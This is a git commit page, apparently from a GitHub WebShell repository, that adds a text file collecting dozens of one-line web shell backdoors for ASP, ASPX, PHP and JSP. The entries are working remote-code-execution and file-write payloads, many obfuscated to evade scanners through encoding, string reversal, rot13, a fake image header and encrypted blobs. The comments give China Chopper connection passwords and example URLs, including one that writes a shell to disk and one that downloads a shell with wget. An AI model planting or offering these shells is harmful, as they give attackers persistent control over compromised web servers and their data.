add small_shell.txt @tdifg 👍

from : https://github.com/tdifg/WebShell
2024-11-21 18:53:03 +00:00 · 2015-06-18 08:43:25 +08:00 · 2015-06-18 08:43:25 +08:00 · 83b3c84696
commit 83b3c84696
parent 10309d2d60
1 changed files with 244 additions and 0 deletions
--- a/other/small_shell.txt
+++ b/other/small_shell.txt
@ -0,0 +1,244 @@
+======================================================
+||                     ASP一句话                    ||
+======================================================
+----------------------------------------
+<%
+<!-- caidao setting input:<O>sb=eval(request(0))</O>,connecting pass:0 -->
+re= request("sb")
+if re <>"" then
+execute re
+response.end
+end if
+%>
+----------------------------------------
+<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>
+----------------------------------------
+<%   
+codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"  
+execute (decode (codeds) )   
+Function DeCode (Coded)   
+    On Error Resume Next  
+    For i = 1 To Len (Coded)   
+        Curchar = Mid (Coded, i, 1)   
+        If Asc (Curchar) = 16 then   
+            Curchar = chr (8)   
+Elseif Asc (Curchar) = 24 then   
+            Curchar = chr (12)   
+Elseif Asc (Curchar) = 32 then   
+            Curchar = chr (18)   
+        Else    
+            Curchar = chr (Asc (Curchar) -3)   
+        End if   
+        DeCode = Decode&Curchar   
+    Next  
+End Function  
+'response.write(decode(codeds)) 
+' 菜刀连接 /hkmjj.asp?xx=x ,密码 hkmjj
+%>
+----------------------------------------
+<% 
+dim x1,x2 
+x1 = request("pass") 
+x2 = x1 
+eval x2 
+%>
+----------------------------------------
+<% 
+Function MorfiCoder(Code) 
+  MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) 
+End Function 
+Execute MorfiCoder(")/*/z/*/(tseuqer lave") 
+%>
+Password: z
+----------------------------------------
+<%a=request("cmd")%><%eval a%>
+----------------------------------------
+<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
+----------------------------------------
+<%execute(request("xiaoma"))%>
+----------------------------------------
+1":eval request("a")'
+----------------------------------------
+"%><%eval request("a")%><%'" 
+----------------------------------------
+<%Y=request("x")%> <%execute(Y)%>
+----------------------------------------
+<%eval request("xiaoma")%>
+----------------------------------------
+┼癥污爠煥敵瑳∨≡┩愾  password: a
+----------------------------------------
+======================================================
+||                     ASPX一句话                   ||
+======================================================
+----------------------------------------
+<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
+----------------------------------------
+<% @Page Language="Jscript"%><%eval(Request.Item["hucxsz"],"unsafe");%>
+----------------------------------------
+<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }%>
+----------------------------------------
+<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
+----------------------------------------
+<script type="text/javascript" language="C#">// <![CDATA[
+ WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); // ]]></script>
+Password: webadmin
+----------------------------------------
+<script runat="server" language="JScript"> 
+   function popup(str) { 
+  var q = "u"; 
+  var w = "afe"; 
+  var a = q + "ns" + w; 
+  var b= eval(str,a); 
+  return(b); 
+   } 
+</script>
+----------------------------------------
+<% 
+popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); 
+%>
+Password: z
+----------------------------------------
+<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["xiaoma"],"unsafe"));%>
+----------------------------------------
+<%@ Page Language="C#" ValidateRequest="false" %>
+<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["f4ck"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
+======================================================
+||                     PHP一句话                    ||
+======================================================
+----------------------------------------
+?JFIF 
+<?php @eval($_POST['caidao']);?>
+----------------------------------------
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
+----------------------------------------
+<?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>
+----------------------------------------
+<?php array_map("ass\x65rt",(array)$_REQUEST['test']);?>
+----------------------------------------
+<?php $item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>
+----------------------------------------
+<?php if(isset($_POST["f4ck"])){$a=strrev("edoced_46esab");eval($a($_POST[z0]));}?>
+----------------------------------------
+<?php if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3'){eval($_POST[console]);}else{die('fuck off!');}?>
+----------------------------------------
+<?php
+//Password: $ws->Run
+eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA==')));
+?>
+----------------------------------------
+<?php
+	$fatezero	= "SABERBERSERKER(\$LANCERPCASTEROSTCASTERARCHERCASTER'faCASTERtASSASSINzCASTERASSASSINCASTERro'RIDER)GINTAMA";
+	$fatestaynight	= str_replace("CASTER", "", $fatezero);
+	$fatezero	= str_replace("LANCER", "_", $fatestaynight);
+	$fatestaynight	= str_replace("SABER", "ev", $fatezero);
+	$fatezero	= str_replace("BERSERKER", "al", $fatestaynight);
+	$fatestaynight	= str_replace("RIDER", "]", $fatezero);
+	$fatezero	= str_replace("GINTAMA", ";", $fatestaynight);
+	$fatestaynight	= str_replace("ARCHER", "[", $fatezero);
+	$fatezero	= str_replace("ASSASSIN", "e", $fatestaynight);
+
+	if($fatestaynight !== $fatezero)
+	{
+		eval($fatezero);//fatezero
+	}
+?> 
+----------------------------------------
+<?php
+//http://test.com/get_write.php?a=/shell.php&b=3C3F70687020406576616C28245F504F53545B2763616964616F275D293B3F3E
+//caidao connecting http://test.com/shell.php	pass:caidao
+$p=realpath(dirname(__FILE__)."/").$_GET["a"];
+$t=$_GET["b"];
+$tt="";
+for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2));
+@fwrite(fopen($p,"w"),$tt);
+echo "success!";
+var_dump($p,$tt);
+?>
+----------------------------------------
+<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['k8']);?>
+----------------------------------------
+<?php $mujj = $_POST['z'];if ($mujj!=""){$xsser=base64_decode($_POST['z0']);@eval("\$safedg = $xsser;");}?>
+----------------------------------------
+<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
+----------------------------------------
+<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>
+----------------------------------------
+<?php fputs(fopen("./shell.php","w"),"<?eval(\$_POST[a]);?>")?>
+----------------------------------------
+<?php if($_POST[admin]){assert($_POST[admin]);}else{phpinfo();}?>
+----------------------------------------
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)','add');?>
+----------------------------------------
+<?php ($_=@$_GET[2]).@$_($_POST[1])?>
+caidao: http://site/1.php?2=assert Password: 1
+----------------------------------------
+<?php
+$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
+$hh("/[discuz]/e",$_POST['h'],"Access");
+?>
+----------------------------------------
+<?php
+$user="63a9f0ea7bb98050796b649e85481845"; #root
+$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
+
+if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
+{eval($_GET['idc']);}
+?>
+---------------------------------------
+<?php
+    $func = new ReflectionFunction($_GET[m]);
+    echo $func->invokeArgs(array($_GET[c],$_GET[id]));
+?>
+shell.php?m=file_put_contents&c=test.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
+shell.php?m=file_put_contents&c=test.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
+shell.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test.php //在当前目录下面生成一句话马 for windows
+shell.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test.php //当前目录下载一句话马 for linux
+----------------------------------------
+<?php assert($_POST[sb]);?>
+----------------------------------------
+<script language="php">@eval($_POST[sb])</script>
+caidao: <O>h=@eval($_POST1);</O>  Password: sb
+----------------------------------------
+<?php eval($_POST[xiaoma]);?>
+----------------------------------------
+<?php $_GET['ts7']($_POST['cmd']);?>
+//caidao: http://www.target.com/shell.php?ts7=assert
+----------------------------------------
+<?php
+@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
+@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
+@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
+[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // Password: -7
+?>
+----------------------------------------
+<?fputs(fopen("test.php","w"),'<?php eval($_POST["cmd"]);?>');?>
+----------------------------------------
+<?php
+error_reporting(0);
+set_time_limit(0);
+function decrypt($ciphertext_hex,$key){
+$key=md5($key);
+$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
+$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
+$ciphertext_dec = pack("H*",$ciphertext_hex);
+$iv_dec = substr($ciphertext_dec, 0, $iv_size);
+$ciphertext_dec = substr($ciphertext_dec, $iv_size);
+$plaintext_dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key,$ciphertext_dec, MCRYPT_MODE_CBC, $iv_dec);
+return trim($plaintext_dec);
+}
+if(@$_REQUEST['key']){
+$key=$_REQUEST['key'];
+$hash='bd40dd58f44adc5c334e53418ea1bcd591521d60662c6753b89dc46bb02b1ecb02bf857eaa0ea5d5a36ecf638d65c55eb9a8f2b17ceb2d740e3eba7792d3995b7d4fdbdf9f5f90b219cf955539b169a40109ff496262cbc21050e6993d1f9a6a678990e0b01a03617dd4b38358d78e9a67eabe8b288487a96ca55a94e8d6614a';
+$shellcode='12ec445a8c4be78007d08367455c60d571c3509ba62d1f2b321fa824667345ff3131b02b81c8ad646ffc3360e60d19d3f7f43b7b21f5bca05d6e7abfc2461b5d72fffb22659aa08655cdd8734baa0fd47b93a5659348954f853d3a68022fb3422a3832efa04792c1a81680e5aa8081716f169e05afb332a26fbd0f76ae8905b9a068ddb54f3ae107ba673362835951f4953db1079b6a3c0b4eb20ca96a241936244947ee67e0d563d8b2eee439cc5ba21151ae520eec0a663f092f9845918c7d6630764dad77808e376e099008403b01c491399da5cb3c8926c29b1bf89e8c751fb33a850c608b20e4c41cf28ec8b8060a30a827b43cd301d9c587863ce39f2326345a0217110fc898acb6c3343f3ce8';
+eval(decrypt($hash,$key));
+}else{
+echo 'ERROR!';
+}
+//caidao:  <0>key=90sec</0>  or  Url: http://www.target.com/90sec.php?key=90sec   Password: shell
+----------------------------------------
+======================================================
+||                     JSP一句话                    ||
+======================================================
+----------------------------------------
+<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
+----------------------------------------